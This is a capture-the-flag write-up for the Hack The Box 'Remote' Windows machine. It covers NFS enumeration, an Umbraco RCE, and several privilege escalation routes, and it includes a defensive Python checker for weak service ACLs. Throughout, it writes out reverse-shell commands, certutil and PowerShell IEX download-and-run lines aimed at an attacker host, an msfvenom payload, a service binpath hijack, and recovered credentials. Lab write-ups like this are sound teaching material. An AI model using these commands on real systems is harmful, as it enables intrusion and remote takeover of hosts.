ENUMERATION
Nmap tcp full scan
nmap -A -p- -oN nmap_tcp_all.txt 10.10.10.180
The nmap output highlighted the presence of:
- FTP on port 21: Microsoft ftpd. Anonymous login allowed.
- web server on port 80: Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
- rpcbind on port 111: 2-4 (RPC #100000)
- msrpc on ports 135, 49154, 49664-49667, 49678-49680: Microsoft Windows RPC
- mountd (nfs) on port 2049: 1-3 (RPC #100005)
- netbios-ssn, microsoft-ds? (Samba) on ports 139, 445
- winrm (Windows Remote Management) on ports 5985, 47001: Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
EXPLOITATION
SMB shares listing wasn't possible.
FTP anonymous connection was enabled, but no files were available and file upload was forbidden.
NFS
showmount revealed an NFS export that could be mounted by everyone.
showmount -e 10.10.10.180
The export contained the website project backup.
mount -t nfs 10.10.10.180:/site_backups ./backups
ls showed a typical .NET application directory tree.
Web.config included the Umbraco version: Umbraco 7.12.4.
Umbraco RCE
An authenticated RCE exploit was available for this version but I didn't have valid credentials.
The Contact section showed a button to access the back office, which redirected to the login page at http://10.10.10.180/umbraco/#/login/false?returnPath=%252Fforms.
Common default credentials like admin/admin and admin/password didn't work. The next step was searching for a username and password within the backup files.
NOTE: grepping files through the mounted export was really slow, so I first created a local copy of the export with
cp -r ./backups ./remote_backup
and then searched for both usernames and passwords:
grep -ir username
grep -ir password
A lot of results came out but I couldn't find anything useful, except for a confirmation that an admin account existed.
Several configuration files were found under the /Config directory, but here too I couldn't retrieve useful credentials 🕵.
In a situation like this it's helpful to gain information about the installed CMS/framework to have a better understanding of where sensitive files are stored. As reported below, App_Data/Umbraco.sdf should contain the database credentials.
As a reminder about the .NET application structure: the App_Data folder can contain interesting files, as reported here:
strings ./App_Data/Umbraco.sdf
revealed the following credentials: the username admin@htb.local and the related password SHA1 hash b8be16afba8c314ad33d812f22a04991b90e2aaa.
The cleartext password is bacondandcheese.
It was time to try the exploit. The default payload consists of some XML lines which contain C# code that creates a new process using the System.Diagnostics.Process class and runs an arbitrary executable (calc.exe).
proc.StartInfo.FileName is the name of the executable you want to run; proc.StartInfo.Arguments stores the arguments you want to pass to the executable.
Ping test (SUCCESS)
The first attempt was pinging my system:
cmd.exe /c ping -n5 10.10.16.144
It worked!
certutil nc.exe (FAIL)
The next step was trying to download nc.exe to the C:\windows\temp directory in order to launch a reverse shell:
cmd.exe /c certutil -urlcache -split -f http://10.10.16.144/nc.exe c:\\windows\\temp\\
I didn't get any interaction from the target…
Anyway, removing the output path seemed to work... at least for the file transfer.
cmd.exe /c certutil -urlcache -split -f http://10.10.16.144/nc.exe
In fact the web server received the GET request…
…unfortunately I couldn't run the nc.exe binary, neither using cmd.exe as FileName…
cmd.exe /c .\\nc.exe -e cmd.exe 10.10.16.144 4545
nor using nc.exe as FileName 😤.
.\\nc.exe -e cmd.exe 10.10.16.144 4545
Maybe I messed up with \…
The next option to consider was using powershell.exe. A local copy of the Nishang reverse shell was created and modified by adding the invocation line at the end of the script:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.144 -Port 4545
The payload was modified as follows:
powershell.exe IEX(New-Object Net.WebClient).downloadString(\'http://10.10.16.144/Invoke-PowerShellTcp.ps1\')
Finally a reverse shell as iis apppool\defaultapppool was obtained.
PRIVILEGE ESCALATION
JuicyPotato (FAIL)
Another machine where the user had the SeImpersonatePrivilege privilege… as we have already seen, that means we should try JuicyPotato.
Having rarely used powershell on Windows boxes, I wasn't aware of wget. It is really handy to download files.
wget 'http://10.10.16.144/JuicyPotato.exe' -outfile .\JuicyPotato.exe
As usual I also transferred nc.exe.
Just when you think there is an easy win, things don't work. I thought that the solution was changing the default CLSID, as seen in one of the previous boxes, but a list of Windows Server 2019 CLSIDs wasn't available.
PrintSpoofer
Searching on google for "windows server 2019 juicypotato" provides the following link, which explains in detail that recent Windows versions like Windows 10 and Windows Server 2019 need another way to escalate privileges. The exploit is available here.
While *Potato exploits rely on COM storage objects, and since the connection to them is now allowed only on TCP port 135, PrintSpoofer obtains token impersonation through named pipes instead. The exploit leverages an RPC call to a function exposed by the Print Spooler service.
Since I had already transferred nc.exe, I passed it to PrintSpoofer as an argument in order to obtain a reverse shell as NT AUTHORITY\SYSTEM.
.\PrintSpoofer.exe -c ".\nc.exe 10.10.16.144 5454 -e cmd"
Requirements:
- Print Spooler service must be running
- SMB running: ports 139, 445 were open
UsoSvc
Another privilege escalation vector was represented by a misconfigured service: UsoSvc.
winPEAS highlighted how the current user had full access to the service.
Since I couldn't run sc qc from powershell, and since I'm more comfortable with the cmd prompt, I launched another reverse shell…
sc qc UsoSvc
The output showed the service configuration:
START_TYPE: AUTO_START means that the service is started at system startup/reboot.
BINARY_PATH_NAME: C:\Windows\system32\svchost.exe -k netsvcs -p indicates the service executable path.
SERVICE_START_NAME: LocalSystem means that the service runs as SYSTEM.
sc query UsoSvc
The output indicates that the service is running and that it can be stopped.
Since the NT AUTHORITY\SERVICE group has SERVICE_ALL_ACCESS permission and…
…the current user is part of that group, I could change the service configuration.
First, a .exe reverse shell was generated and transferred to the target.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.14 LPORT=4444 -f exe > rev.exe
The executable path of the service was modified as follows:
sc config usosvc binpath="C:\windows\temp\rev.exe"
Finally the vulnerable service was stopped and started to trigger the execution of the new binary:
net stop usosvc
net start usosvc
A SYSTEM reverse shell was obtained.
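As an added defender-side example (not part of the original writeup or of any tool it mentions), the following Python script parses the SDDL string that sc sdshow <service> prints and flags allow-ACEs that give a broad trustee such as NT AUTHORITY\SERVICE the ChangeConfig, WriteDAC or WriteOwner rights that made the UsoSvc binary path rewrite above possible; the UsoSvc descriptor in the script is constructed for the example, not captured from the box.

```python
import re

# Service-specific access rights as they appear in the DACL printed by "sc sdshow <name>".
# SERVICE_ALL_ACCESS (what winPEAS reported for NT AUTHORITY\SERVICE on UsoSvc) is all of them.
RIGHTS = {
    "CC": "QueryConfig", "DC": "ChangeConfig", "LC": "QueryStatus", "SW": "EnumDependents",
    "RP": "Start", "WP": "Stop", "DT": "PauseContinue", "LO": "Interrogate",
    "CR": "UserDefinedControl", "SD": "Delete", "RC": "ReadControl", "WD": "WriteDAC",
    "WO": "WriteOwner", "GA": "GenericAll", "GW": "GenericWrite",
}
# Any of these lets the holder rewrite BINARY_PATH_NAME (directly, or after rewriting the DACL),
# which is the exact misconfiguration exploited in the UsoSvc section.
DANGEROUS = {"DC", "WD", "WO", "GA", "GW"}
# Well-known SDDL trustees that a low-privileged logon (such as an IIS AppPool identity) can be in.
BROAD_TRUSTEES = {
    "WD": "Everyone", "AU": "Authenticated Users", "BU": "BUILTIN\\Users",
    "IU": "Interactive", "SU": "NT AUTHORITY\\SERVICE", "AN": "Anonymous",
}
ACE_RE = re.compile(r"\((A|D);([^;]*);([A-Z]*);[^;]*;[^;]*;([^)]*)\)")

# Constructed descriptor for this example (not captured from the box): the last
# allow-ACE grants SERVICE_ALL_ACCESS to SU, mirroring the winPEAS finding.
CONSTRUCTED_USOSVC_SDDL = (
    "D:(A;;CCLCSWRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPLORC;;;IU)"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
)


def parse_dacl(sddl):
    """Return [(ace_type, set_of_right_codes, trustee)] for the D: section of an SDDL string."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0] if "D:" in sddl else ""
    aces = []
    for ace_type, _flags, rights, trustee in ACE_RE.findall(dacl):
        codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}  # two-letter codes
        aces.append((ace_type, codes, trustee))
    return aces


def weak_aces(sddl):
    """Allow-ACEs letting a broad trustee reconfigure the service; can_restart marks Start+Stop too."""
    findings = []
    for ace_type, codes, trustee in parse_dacl(sddl):
        granted = sorted(codes & DANGEROUS)
        if ace_type == "A" and trustee in BROAD_TRUSTEES and granted:
            findings.append({"trustee": BROAD_TRUSTEES[trustee],
                             "rights": [RIGHTS[c] for c in granted],
                             "can_restart": {"RP", "WP"} <= codes})
    return findings


if __name__ == "__main__":
    for finding in weak_aces(CONSTRUCTED_USOSVC_SDDL):
        print(finding)  # a correctly locked-down service prints nothing
```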
Rogue Potato
The third method to get SYSTEM privileges on this box. I strongly suggest you read the writeup by 0xdf, in particular the linked section where he explains how to use RoguePotato and why it worked in the ippsec video even though it was used like JuicyPotato.
socat tcp-listen:135,reuseaddr,fork tcp:10.10.10.180:9999
Transfer both RoguePotato.exe and RogueOxidResolver.exe to the target.
Start a listener on the attacker machine.
Run RoguePotato and receive a high-privilege reverse shell.
Requirements:
- the machine can make an outbound connection on port 135
- SMB running
- DCOM running
If you want to dive deeper, check this presentation.
TeamViewer7 (CVE-2019-18988)
As reported by 0xdf, another PE vector was exploiting TeamViewer. Running tasklist /svc highlighted that TeamViewer7 was running.
An extract from whynotsecurity:
TL;DR: TeamViewer stored user passwords encrypted with AES-128-CBC with the key 0602000000a400005253413100040000 and IV 0100010067244F436E6762F25EA8D704 in the Windows registry. If the password is reused anywhere, privilege escalation is possible.
First, the AES key needs to be extracted from the registry.
Initialize hex_str_cipher with the new string and run the script (from whynotsecurity).
The cleartext is !R3m0te!.
crackmapexec
crackmapexec smb 10.10.10.180 -u administrator -p '!R3m0te!'
(Pwn3d!) means that the credentials work for a user with admin access.
As illustrated by 0xdf, there are 3 ways to get a SYSTEM reverse shell.
evil-winrm
evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180
evil-winrm is a WinRM shell. Remember that during the enumeration phase port 5985 was open.
psexec.py
psexec.py 'administrator:!R3m0te!@10.10.10.180'
psexec lets you execute processes on other systems. By default it tries to run cmd.exe.
wmiexec.py
wmiexec.py 'administrator:!R3m0te!@10.10.10.180'
wmiexec lets you execute commands using Windows Management Instrumentation (WMI).
EXTRA
certutil nc.exe
During my attempts with certutil I didn't try this option because I thought I had to use \ instead of /. I was wrong. The payload also works if paths are specified with forward slashes, as shown below:
Payload to transfer nc.exe and store it in C:\windows\temp\nc.exe:
cmd.exe /c certutil -urlcache -split -f http://10.10.16.144/nc.exe c:/windows/temp/nc.exe
Payload to run the reverse shell:
cmd.exe /c C:/windows/temp/nc.exe -e cmd.exe 10.10.16.144 4545
cmd commands in powershell
Ippsec shows how you can run sc in powershell using sc.exe, for example:
PS > sc.exe query <service_name>
LESSONS LEARNED
- Before randomly reading every file of a CMS/framework, understand how it is installed and where sensitive files are stored.
- Try both nc.exe and powershell.exe to obtain a reverse shell.
- Try both / and \ in the payload when specifying Windows paths.
- When using powershell, specify the .exe extension to use cmd commands: PS> sc.exe query <service_name>
- Handy ways to download files from powershell:
wget 'http://10.10.16.144/JuicyPotato.exe' -outfile .\JuicyPotato.exe
powershell "IEX(IWR http://10.10.10/rev.ps1 -UseBasicParsing)"
- Starting from Windows Server 2019 and Windows 10 1809, MS fixed *Potato exploits. PrintSpoofer and RoguePotato represent new ways to escalate privileges.
- Misconfigured services which are started as LocalSystem represent a PE vector.
- Using AES with a fixed key and IV to encrypt information of different users is not a good idea.
- Check for credential reuse with crackmapexec, evil-winrm, psexec, wmiexec.